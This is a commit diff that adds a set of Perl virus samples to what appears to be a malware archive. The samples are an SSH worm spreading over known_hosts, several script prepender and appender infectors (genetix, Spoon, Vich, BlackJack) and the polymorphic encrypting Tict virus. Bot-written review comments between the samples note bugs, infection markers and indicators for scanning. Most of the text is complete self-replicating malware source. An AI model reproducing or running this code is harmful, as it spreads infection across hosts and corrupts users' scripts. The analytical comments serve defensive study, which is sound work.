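Review bot: The first statement in `sub sadBVa`, `goto b if($ENV{"USER"} eq "root");`, skips the entire loop when run as root, and the `$_ .= " -X"` edit to the target's shebang disables Perl warnings in the infected script; both change how the code behaves in a lab and should be stated in the entry. The trailing `#` comments are 13-character `crypt()` output regenerated per copy (`" #".crypt($tN, rand(256))`) and stripped on read by `s/#[\d].*/$st/`, so they are useless as a signature, whereas the `#!Sran` line inserted after the shebang is stable. In `my $tN = crypt($_, $_), $cW = 0; $oN = "./$_", $nF = $tN;` only `$tN` is lexical; `$cW`, `$oN` and `$nF` are package globals.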

56
Perl/Virus.Perl.SSHWorm Normal file

@ -0,0 +1,56 @@
###############
##
# sshworm - example of a trusted host/key ssh worm
#
# This is extremely primitive and rarely works on anything
# but identical systems running the same versions of ssh.
# It does show how using unencrypted RSA keys for user auth
# across an enterprise can be a really bad thing. Eventually
# you should be able to let this guy go running as root on any
# given system, it will locate each user's known_hosts and
# attempt to gain accesss, reporting its path to a central system.
#
##
use FindBin qw{$Bin};
print ":: sshworm initialized at $Bin\n";
$options = " -o PasswordAuthentication=no ";
##
# stage 1 - attempt to connect to all hosts in known_hosts files
##
if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts"))
{
while ($line = <KH>)
{
($host, undef) = split(/\s+/,$line);
($host, undef) = split(/\,/,$host);
Propagate($host);
}
close (KH);
}
sub Propagate {
open (SSH, "ssh $options $host 'id' 2>/dev/null|");
while ($out = <SSH>)
{
if ($out =~ /uid/)
{
print ":: sshworm found new host $host\n";
system("scp $Bin/$0 $host:/tmp/hello.pl");
system("ssh $host 'perl /tmp/hello.pl'");
}
}
close (SSH);
}
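Review bot: Propagation depends on the two conditions the header names — passphrase-less user keys and a plaintext `~/.ssh/known_hosts` listing reachable hosts — so the defensive reading is `HashKnownHosts yes` in `ssh_config` and keys kept encrypted behind an agent; a server's `PasswordAuthentication=no` is no defence here, since that is exactly the option the code passes in `$options`. `sub Propagate` ignores its argument and reads the global `$host` set in the caller's loop, and `scp $Bin/$0` would double the directory component whenever `$0` already carries a path; both are observations for the analysis, not fixes. The drop location `/tmp/hello.pl` and the follow-on `ssh $host 'perl /tmp/hello.pl'` are the host indicators visible in this section.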


@ -0,0 +1,35 @@
#genetix
#*.bat *.cmd *.pl crossinfector prepender
$TheCode = __FILE__;
$batpart = "
for %%a in (*.bat *.cmd *.pl) do copy %0 %%a
";
my @Vcode = ();
open(Host, $TheCode);
@Vcode = <Host>;
while(<Host>) {
$. > 36 ? last : push @Vcode,$_;
}
close(Host);
while (<*.bat *.cmd *.pl>) {
$Victim = $_;
my @VicCode = ();
open(Target, $Victim);
@VicCode = <Host>;
while(<Target>) {
$. > 36 ? last : push @VicCode,$_;
}
close(Target);
if (@VicCode[1] !~ "#genetix") {
open(Target, ">$Victim");
print Target @Vcode,@VicCode;
close(Target);
}
}
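Review bot: This section arrives with no file-name or size line — only `View File` and `@ -0,0 +1,35 @@` precede it — so the entry has to be catalogued from its own header comments, `#genetix` and `#*.bat *.cmd *.pl crossinfector prepender`. The already-infected test reads `@VicCode[1]`, the target's second line, but `#genetix` is the first line of what gets prepended, so as written the check never matches a file it has already touched; and `@VicCode = <Host>` reads from the handle closed just above, so the victim's content comes only from the `while(<Target>)` loop, which appears to stop at 36 lines via `$. > 36 ? last : push`. The practical consequence for a responder is that hosts end up as the virus body plus at most their first 36 original lines, so recovery means restoring from backup rather than stripping the prepended block.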

43
Perl/Virus.Perl.Spoon Normal file

@ -0,0 +1,43 @@
use File::Find;
&virus();
print "\nThis program is infected by the Perl virus\n\n";
sub virus
{
my ( $pid, $new );
if( $pid = fork ) { return; }
else
{
open( source, $0 );
finddepth ( \&infect, '/home/chris/test' );
sub infect
{
open target, "$File::Find::name";
$_ = <target>;
if ( /(\#!.*perl)/ )
{
$_ = <target>;
if( $_ ne "use File::Find;\n" )
{
$new = $1 . "\nuse File::Find;\n&virus();\n" . $_;
while( <target> ) { $new = $new . $_; }
seek( source, 0, 0 );
while( <source> ne "sub virus\n" ) { };
$new = $new . "\nsub virus\n";
while( <source> ) { $new = $new . $_; }
close target;
open target, ">$File::Find::name";
print target $new;
}
}
close( target );
}
close( source );
exit( 0 );
}
}
# a Perl virus, by paddingx
# 08/15/1999
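Review bot: `finddepth ( \&infect, '/home/chris/test' )` pins the search to one developer's test directory, which marks this as a lab build rather than a released sample and should be noted in the entry; the `.b` variant in this commit widens the same call to `/`. `sub infect` is a named sub declared inside `sub virus` and captures the enclosing `my ( $pid, $new )`, the construction Perl reports as `Variable "$new" will not stay shared` when warnings are on, so it does not behave like a nested closure across calls. The injected text is fixed — the shebang, then `use File::Find;`, `&virus();`, and a `sub virus` body copied from the running file — which gives a clean signature for scanning.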

38
Perl/Virus.Perl.Spoon.b Normal file

@ -0,0 +1,38 @@
use File::Find;
&virus();
print "\nThis program is infected by the Perl virus\n";
sub virus
{
$virus_body = "\n# put here the body of the virus\nsub virus { }\n";
if( $pid = fork ) { return; }
else
{
finddepth ( \&infect, '/' );
sub infect
{
open( target, $File::Find::name );
$_ = <target>;
if ( /(\#!.*perl)/ )
{
$line2 = <target>;
unless( $line2 eq "use Find::File\n" )
{
open( temp, ">/tmp/tmpinfect" );
print temp ($1, "\nuse File::Find;\n&virus();\n", $line2 );
print temp while( <target> );
print temp $virus_body;
close( temp );
system( "mv", "/tmp/tmpinfect", $File::Find::name );
}
}
close( target );
}
exit( 0 );
}
}
# a Perl virus, by paddingx
# 08/13/1999
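Review bot: The already-infected test `unless( $line2 eq "use Find::File\n" )` compares against a reversed module name with no semicolon, while the line the code actually writes is `use File::Find;`, so the test never matches and every pass re-prepends the stub; together with `$virus_body` being the placeholder `"\n# put here the body of the virus\nsub virus { }\n"`, that marks the file as a template rather than a working sample. `finddepth ( \&infect, '/' )` walks the whole filesystem and rewrites every file whose first line matches `/\#!.*perl/` via `/tmp/tmpinfect` and `system( "mv", ... )`, so the indicators are that shared temp path and `mv` executions over script files. Run as-is it would pad scripts with a no-op `sub virus { }` on each pass rather than propagate.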

91
Perl/Virus.Perl.Tict Normal file

@ -0,0 +1,91 @@
# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=<File>;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=<File>;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor
$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?
for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
}
}
$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
}
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop
if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
}
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n"; # and start it
# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
}
}
do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );
open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);
for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
}
}
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO
CloseFile:
close(File);
}}}}
$a = `rm $0`; # delete our selves..
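Review bot: The infection marker is structural rather than textual — the shebang line is padded with spaces until `length(@Temp[0]) % 5 == 0` and that remainder is the only already-infected test — so a scan for a fixed string misses it, while a check for `#!` lines whose length is a multiple of 5 and that end in trailing whitespace finds it. Because the body is stored multiplied or offset by a random `$Key`, joined on a random uppercase separator, and the six placeholder names `l1l 1l1 ll1 lll 11l l11` are renamed per copy, the stable artefacts are the dropper pattern: a file named by one uppercase letter plus a number written to the current directory and run via backticks, and the final `` `rm $0` `` that deletes the running copy. `@Vir`, `@Crypt` and `@Temp` are indexed with the `@Arr[$i]` slice form throughout, which `use warnings` would report as `Scalar value @Vir[0] better written as $Vir[0]`.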

87
Perl/Virus.Perl.Vich Normal file

@ -0,0 +1,87 @@
#onehalf3554
# this perl virus (c)Chernickevich Konstantin
# http://onehalf.hotmail.ru
# email:onehalf3554@mail.ru
system"clear";
$partone="#End_my";
$parttwo="_body";
$EndMarker=$partone.$parttwo;
$infected=0;
$BodyCopy=0;
$textold="";
# this "while" for detecting *.pl file
# and output in the $_ local perl variable
while (<*.pl>)
{
$files=$_;
$text="<".$_;
$textw=">".$_;
$textww=">>".$_;
open(TESTFILE,$text);
until(eof(TESTFILE))
{
$strres=readline(TESTFILE);
# this procedure detecting a marker in the *.pl file
# if marker detected then file infected if not then file not infected!
if ($strres=~ m/onehalf3554/i)
{
if ($BodyCopy==0)
{
$BodyCopy=1;
open(VIRUSBODY,$text);
until ($BodyStr=~ m/$EndMarker/i)
{
$BodyStr=readline(VIRUSBODY) ;
$BodyLoopCount++;
$BodyArray[$BodyLoopCount]=$BodyStr;
}
close(VIRUSBODY);
}
$infected=1;
}
}
close (TESTFILE);
if ($infected==1)
{
print "[im detecting old infecting file :]\n";
print $textw." infected old time.[Ok]\n";
open(RESERVBODY,">body.bod");
print RESERVBODY @BodyArray;
close(RESERVBODY);
}
if ($infected==0)
{
print $textw."im trying infecting this file now! \n";
system "cp ".$files." temp.bod";
open(NULFILE,$textww);
$NUL="";
print NULFILE $NUL;
system "cp body.bod"." ".$files;
open(DATAFILE,"<temp.bod");
until(eof(DATAFILE))
{
$reloader=readline(DATAFILE);
print NULFILE $reloader;
}
close(DATAFILE);
close(NULFILE);
}
}
#End_my_body
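Review bot: The end marker is assembled at run time (`$partone.$parttwo`) so the literal `#End_my_body` appears in the source only on the last line, while the start marker `onehalf3554` is matched case-insensitively on every line of every `*.pl` in the directory; both strings are stable across copies and are what a scan should look for. The sample leaves `body.bod` and `temp.bod` in the working directory and replaces the target with `system "cp body.bod"." ".$files` before appending the original back, so those two filenames and a `.pl` file that begins with `#onehalf3554` are the on-disk indicators. `$BodyLoopCount` is incremented before the assignment, so `$BodyArray[0]` stays undefined and is printed as an empty string into `body.bod`.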


@ -0,0 +1,23 @@
open(File,$0);
@Vir=<File>;
#BlackJack
@Virus=@Vir[-23...-1];
close(File);
foreach $FileName (<*>)
{
if ((-r $FileName) && (-w $FileName) && (-f $FileName))
{
open(fuck, "$FileName");
@aFucks=<fuck>;
close(fuck);
if ((@aFucks[0] =~ "perl") || (@aFucks[1] =~ "perl"))
{
if ( not (@aFucks[-21] =~ "BlackJack"))
{
open(fuck, ">>$FileName");
print fuck @Virus;
close(fuck);
}
}
}
}
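Review bot: This section, like the `#genetix` one earlier in the commit, has no file-name or size line in this render — `View File` and `@ -0,0 +1,23 @@` are all that precede it — so it must be catalogued from the `#BlackJack` marker on its third line. The already-infected test reads `@aFucks[-21]`, the 21st line from the end, while the appended block is `@Vir[-23...-1]`, the last 23 lines of the running file; the two offsets agree only when the marker sits exactly two lines into the block and the host ends with no extra trailing lines, so a host with a trailing newline would be appended to again. The literal `#BlackJack` is therefore the reliable string to scan for in files whose first or second line mentions `perl`.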